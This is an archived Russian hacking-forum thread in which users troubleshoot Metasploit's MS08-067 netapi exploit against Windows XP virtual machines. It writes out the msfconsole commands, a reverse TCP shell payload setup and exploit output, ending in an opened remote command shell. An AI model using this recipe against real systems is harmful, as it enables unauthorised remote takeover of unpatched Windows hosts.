PDA

Просмотр полной версии : Metasploit (Ubuntu) не могу найти MS08-067_netapi


Ru}{eeZ
07.06.2010, 00:33
Собрал из исходников метасплоит на убунте, ввожу в консоль (msfconsole) выбор эксплоита, но почему-то он не находится, в чём дело? Ведь он есть в /msf3/modules/exploits/windows/smb/
msf > use MS08-067_netapi
[-] Failed to load module: MS08-067_netapi


НОВЫЙ ВОПРОС НИЖЕ!

rap1t
07.06.2010, 00:44
ты сам ответил на свой вопрос
use exploit/windows/smb/ms08_067_netapi

Ru}{eeZ
07.06.2010, 00:52
ты сам ответил на свой вопрос
use exploit/windows/smb/ms08_067_netapi
спасибо большое! а я пробовал полный путь указывать)

Ru}{eeZ
07.06.2010, 01:38
Новый вопрос:
Почему я не могу получить доступ к системе (поставил на вирт. машину голый Windows XP SP2 RU)? На ней нет никаких заплаток.

Started reverse handler on 127.0.0.1:4444

Automatically detecting the target...

Fingerprint: Windows XP Service Pack 2 - lang:Russian

Selected Target: Windows XP SP2 Russian (NX)

Attempting to trigger the vulnerability...

Exploit completed, but no session was created.

До этого:

msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp

msf exploit(ms08_067_netapi) > set RHOST 172.31.34.250
RHOST => 172.31.34.250

msf exploit(ms08_067_netapi) > set LHOST 127.0.0.1
LHOST => 127.0.0.1

overxor
07.06.2010, 03:17
>> LHOST => 127.0.0.1
После пробива у тебя идет попытка соединения на локальный интерфейс.

Измени на ip адрес совей Ubunt'ы

Ru}{eeZ
07.06.2010, 17:45
>> LHOST => 127.0.0.1
После пробива у тебя идет попытка соединения на локальный интерфейс.

Измени на ip адрес совей Ubunt'ы

Спасибо, теперь получилось)

Только вот не могу понят, пробую атаковать голую без заплаток и с выключенным брандмауэром свою XP SP2 на виртуалке, выдаёт:

msf exploit(ms08_067_netapi) > exploit

Started reverse handler on 172.31.47.208:4444
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 2 - lang:Russian
Selected Target: Windows XP SP2 Russian (NX)
Attempting to trigger the vulnerability...
Exploit completed, but no session was created.



Атакую юзаемый Windows XP SP3 - атака проходит:

Started reverse handler on 172.31.47.208:4444
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 3 - lang:Russian
Selected Target: Windows XP SP3 Russian (NX)
Attempting to trigger the vulnerability...
Command shell session 1 opened (172.31.47.208:4444 -> 172.31.47.196:2658) at Mon Jun 07 14:39:12 +0400 2010

Microsoft Windows XP [������ 5.1.2600]
(�) ��௮����� ����������, 1985-2001.

C:\WINDOWS\system32>



Почему так может быть?